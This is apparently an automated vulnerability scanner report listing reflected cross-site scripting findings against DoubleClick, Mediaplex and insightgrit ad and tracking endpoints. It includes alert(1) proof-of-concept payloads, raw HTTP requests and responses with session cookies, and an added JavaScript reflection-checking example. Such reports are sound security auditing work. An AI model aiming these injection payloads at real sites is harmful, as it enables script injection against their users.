The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81584"-alert(1)-"f1713590b03 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:44 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6426
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 02%3B4252-336/280%3B39025850/39043607/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory81584"-alert(1)-"f1713590b03&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is"); var fscUrl = url; var fscUrlClickTagFound ...[SNIP]...
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 919b0"-alert(1)-"47f06942a38 was submitted in the pos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:52 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6425
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:35 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... /280%3B39025848/39043606/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle919b0"-alert(1)-"47f06942a38&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is"); var fscUrl = url; var fscUrlClickTagFound = false; var ...[SNIP]...
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d759f'-alert(1)-'26bb58939a1 was submitted in the pos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:56 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6428
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:59 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... /280%3B39025845/39043602/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddled759f'-alert(1)-'26bb58939a1&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\"> ...[SNIP]...
The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e2d2'-alert(1)-'8bc2132a1be was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:49 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6425
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:35 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... x_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b1e2d2'-alert(1)-'8bc2132a1be&goto=http://www.xc4.is\"> ...[SNIP]...
The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c3cf"-alert(1)-"2797ce68773 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:45 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6428
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:06:42 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... x_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b9c3cf"-alert(1)-"2797ce68773&goto=http://www.xc4.is"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 0; var ...[SNIP]...
The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46242"-alert(1)-"4c02dbc8d53 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:18 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6428
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:59 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 1%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e346242"-alert(1)-"4c02dbc8d53&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "nev ...[SNIP]...
The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e338'-alert(1)-'16742ae9f75 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:23 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6426
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 1%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e31e338'-alert(1)-'16742ae9f75&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\"> ...[SNIP]...
The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f835"-alert(1)-"d4361fd75fc was submitted in the snr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:27 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6426
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick3f835"-alert(1)-"d4361fd75fc&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25932'-alert(1)-'7a4e7340a55 was submitted in the snr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:32 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6425
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:35 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick25932'-alert(1)-'7a4e7340a55&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\"> ...[SNIP]...
The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df5cf"-alert(1)-"cabd323b909 was submitted in the snx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:36 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6425
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:35 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073df5cf"-alert(1)-"cabd323b909&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36d88'-alert(1)-'b2fe71d3c54 was submitted in the snx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:40 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6426
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=128980207336d88'-alert(1)-'b2fe71d3c54&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\"> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2742c'-alert(1)-'b4a024bcc9a was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:40 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6426
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 8/3a53/7/10c/%2a/s%3B231651615%3B2-0%3B0%3B55718902%3B4252-336/280%3B39025850/39043607/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto2742c'-alert(1)-'b4a024bcc9a&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.i ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b2d8"-alert(1)-"096a80d911b was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:35 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6428
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:06:42 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 8/3a53/7/10c/%2a/x%3B231651615%3B3-0%3B0%3B55718902%3B4252-336/280%3B39025852/39043609/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto8b2d8"-alert(1)-"096a80d911b&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.i ...[SNIP]...
The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d70c0'-alert(1)-'8fa323c2db8 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88c62'%3balert(1)//0a40d0aebfa was submitted in the mpvc parameter. This input was echoed as 88c62';alert(1)//0a40d0aebfa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
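How the "echoed unmodified" and "echoed as ..." statements in these findings are derived, as an added example that is not part of the report and not Burp Suite's code. A canary payload is a random hex prefix, a probe and a random hex suffix; the prefix and suffix locate the reflection in the response body, and whatever sits between them shows what the server did to the probe (the mpvc finding just above is the case where %3b came back URL-decoded as ;). The response fragments are constructed, shortened from the shape of the evidence quoted in this report; makeCanary, classifyReflection and breaksOutOfJsString are names chosen for the example.

```javascript
// Added example: canary-based reflection check for script-string contexts.

// Build a payload like those in the report: random prefix, probe, random suffix.
// Math.random is fine here; the canary only needs to be unique, not secret.
function makeCanary(probe, length = 5) {
  const hex = () =>
    Array.from({ length }, () => '0123456789abcdef'[Math.floor(Math.random() * 16)]).join('');
  const prefix = hex();
  const suffix = hex() + hex();
  return { prefix, probe, suffix, payload: prefix + probe + suffix };
}

// Locate the reflection between prefix and suffix and say what happened to the probe:
// 'unmodified', 'url-decoded' (server decoded %XX before echoing), 'transformed'
// (escaped or otherwise altered), or 'absent'.
function classifyReflection(body, prefix, probe, suffix) {
  const start = body.indexOf(prefix);
  if (start === -1) return { echoed: false, reflected: null, form: 'absent' };
  const from = start + prefix.length;
  const end = body.indexOf(suffix, from);
  if (end === -1) return { echoed: false, reflected: null, form: 'absent' };
  const reflected = body.slice(from, end);
  let form = 'transformed';
  if (reflected === probe) form = 'unmodified';
  else if (reflected === decodeURIComponent(probe)) form = 'url-decoded';
  return { echoed: true, reflected, form };
}

// Can the reflected text terminate a JavaScript string literal delimited by `quote`?
// A quote preceded by an odd number of backslashes is escaped and does not count.
function breaksOutOfJsString(reflected, quote) {
  for (let i = 0; i < reflected.length; i++) {
    if (reflected[i] !== quote) continue;
    let backslashes = 0;
    for (let j = i - 1; j >= 0 && reflected[j] === '\\'; j--) backslashes++;
    if (backslashes % 2 === 0) return true;
  }
  return false;
}

// Constructed response fragments, shaped like the evidence in this report.
const SAMPLES = [
  { // quote-break probe echoed verbatim into a single-quoted literal
    prefix: 'c453b', probe: "'-alert(1)-'", suffix: '81b54708230', quote: "'",
    body: "document.write('...&goto=&c453b'-alert(1)-'81b54708230=1http://www.xc4.is');",
  },
  { // %3b probe echoed with the server's URL decoding applied
    prefix: '88c62', probe: "'%3balert(1)//", suffix: '0a40d0aebfa', quote: "'",
    body: "var mpvc = '88c62';alert(1)//0a40d0aebfa';",
  },
  { // a hardened server: the quote came back as \x27, so the literal is intact
    prefix: '88c62', probe: "'%3balert(1)//", suffix: '0a40d0aebfa', quote: "'",
    body: "var mpvc = '88c62\\x27;alert(1)//0a40d0aebfa';",
  },
  { // the parameter is not reflected at all
    prefix: 'd70c0', probe: "'-alert(1)-'", suffix: '8fa323c2db8', quote: "'",
    body: "var mpt = 'default';",
  },
];

function scanSamples(samples) {
  return samples.map((s) => {
    const r = classifyReflection(s.body, s.prefix, s.probe, s.suffix);
    const exploitable = r.echoed && breaksOutOfJsString(r.reflected, s.quote);
    return { form: r.form, reflected: r.reflected, exploitable };
  });
}

for (const result of scanSamples(SAMPLES)) console.log(result);
```

Only the first two samples are reported as exploitable: the probe came back with an unescaped quote, either verbatim or after URL decoding. The third shows what a correct fix looks like from the scanner's side, and the fourth is the no-reflection case that should produce no finding.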
4.92. http://altfarm.mediaplex.com/ad/js/11321-114995-1358-11 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://altfarm.mediaplex.com
Path: /ad/js/11321-114995-1358-11
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 158b3'%3balert(1)//1fd61cf7f60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 158b3';alert(1)//1fd61cf7f60 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db8f3'-alert(1)-'7aa45b5fe58 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0f3e'%3balert(1)//2351d3570d4 was submitted in the mpvc parameter. This input was echoed as b0f3e';alert(1)//2351d3570d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.95. http://altfarm.mediaplex.com/ad/js/11321-114995-1358-12 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://altfarm.mediaplex.com
Path: /ad/js/11321-114995-1358-12
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7282'%3balert(1)//dabb31c2c87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d7282';alert(1)//dabb31c2c87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f00d"-alert(1)-"9ba223d4dfb was submitted in the mpt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 621f8"%3balert(1)//eb4cfdb33af was submitted in the mpvc parameter. This input was echoed as 621f8";alert(1)//eb4cfdb33af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.98. http://altfarm.mediaplex.com/ad/js/11921-102238-1358-0 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://altfarm.mediaplex.com
Path: /ad/js/11921-102238-1358-0
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8bfdd"-alert(1)-"59ecd8958d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ad/js/11921-102238-1358-0?8bfdd"-alert(1)-"59ecd8958d5=1 HTTP/1.1 Host: altfarm.mediaplex.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mojo2=12109:16388/9966:3945; mojo1=s/47634/10; mojo3=11921:1358/11321:1358/14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; svid=804356890302;
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c22f5"%3balert(1)//f53e72d2858 was submitted in the cid parameter. This input was echoed as c22f5";alert(1)//f53e72d2858 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Visit.php?vt=O&rid=84196364354717&chid=320&c=84196&kw=cloud%20computing&adid=5624934659&cid=1234c22f5"%3balert(1)//f53e72d2858&lsd=Google&cta=Webmetrics%20Trial&_kk=cloud%20computing&_kt=612eff42-38f6-41ff-ac8e-5044b89f5890/x22 HTTP/1.1 Host: app.insightgrit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 09:33:02 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Mon, 15 Nov 2010 09:33:02 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=b9828d75a1f6c563c9b9161d81f0a25a; path=/ Set-Cookie: IG84196=84196%3A%3Ab9828d75a1f6c563c9b9161d81f0a25a%3A%3A%3A%3A5624934659; expires=Fri, 14-Jan-2011 09:33:02 GMT; domain=app.insightgrit.com p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT" Content-Length: 1246 Connection: close Content-Type: text/html
The value of the cta request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 248b0"%3balert(1)//90365561f2b was submitted in the cta parameter. This input was echoed as 248b0";alert(1)//90365561f2b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Visit.php?vt=O&rid=84196364354717&chid=320&c=84196&kw=cloud%20computing&adid=5624934659&cid=1234&lsd=Google&cta=Webmetrics%20Trial248b0"%3balert(1)//90365561f2b&_kk=cloud%20computing&_kt=612eff42-38f6-41ff-ac8e-5044b89f5890/x22 HTTP/1.1 Host: app.insightgrit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 09:33:03 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Mon, 15 Nov 2010 09:33:03 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=d8b92fbdd47650d83f91811bc30e7132; path=/ Set-Cookie: IG84196=84196%3A%3Ad8b92fbdd47650d83f91811bc30e7132%3A%3A%3A%3A5624934659; expires=Fri, 14-Jan-2011 09:33:03 GMT; domain=app.insightgrit.com p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT" Content-Length: 1246 Connection: close Content-Type: text/html
The value of the kw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bef2"%3balert(1)//26cf77cb37d was submitted in the kw parameter. This input was echoed as 5bef2";alert(1)//26cf77cb37d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Visit.php?vt=O&rid=84196364354717&chid=320&c=84196&kw=cloud%20computing5bef2"%3balert(1)//26cf77cb37d&adid=5624934659&cid=1234&lsd=Google&cta=Webmetrics%20Trial&_kk=cloud%20computing&_kt=612eff42-38f6-41ff-ac8e-5044b89f5890/x22 HTTP/1.1
Host: app.insightgrit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
